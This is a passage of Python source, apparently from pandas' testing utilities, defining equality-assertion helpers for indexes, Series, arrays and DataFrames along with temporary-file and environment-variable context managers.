0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
        # Equivalent to setting check_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
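# Quick examples (editor's sketch, not part of pandas) of the tolerance
# semantics documented above: values within rtol/atol pass, larger gaps raise
# AssertionError. The _demo_* name is a hypothetical addition.
def _demo_assert_almost_equal():
    assert_almost_equal(1.000001, 1.0000014)  # within the default rtol=1e-5
    assert_almost_equal(np.array([0.1, 0.2]), np.array([0.1, 0.2]))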
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
    Generate an array of random strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
    Generate one random string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
    Get a temporary file path and ensure it is removed when the context exits.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
    :meth:`tempfile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
    Get a temporary directory path and ensure it is removed when the context exits.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
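# Example (editor's sketch, not part of pandas): environment mutations inside
# the block do not leak out; the _demo_* name is a hypothetical addition.
def _demo_safe_environment():
    before = dict(os.environ)
    with ensure_safe_environment_variables():
        os.environ["__DEMO_ONLY__"] = "1"
    assert dict(os.environ) == before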
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
            if l.inferred_type in ("string",):
                assert r.inferred_type in ("string",)
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
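# Examples (editor's sketch, not part of pandas) of the semantics described
# above; the _demo_* name is a hypothetical addition.
def _demo_assert_index_equal():
    # RangeIndex vs Int64Index passes under the default exact="equiv"
    assert_index_equal(RangeIndex(3), Index([0, 1, 2]))
    # element order can be ignored explicitly
    assert_index_equal(Index([2, 1]), Index([1, 2]), check_order=False)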
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
assert_equal(left._right, right._right, obj=f"{obj}.left", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
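# Example (editor's sketch, not part of pandas): tolerant vs exact comparison;
# the _demo_* name is a hypothetical addition.
def _demo_assert_series_equal():
    left = Series([1.0, 2.0])
    right = Series([1.0, 2.0 + 1e-9])
    assert_series_equal(left, right)  # passes: difference is inside atol/rtol
    # assert_series_equal(left, right, check_exact=True) would raise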
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
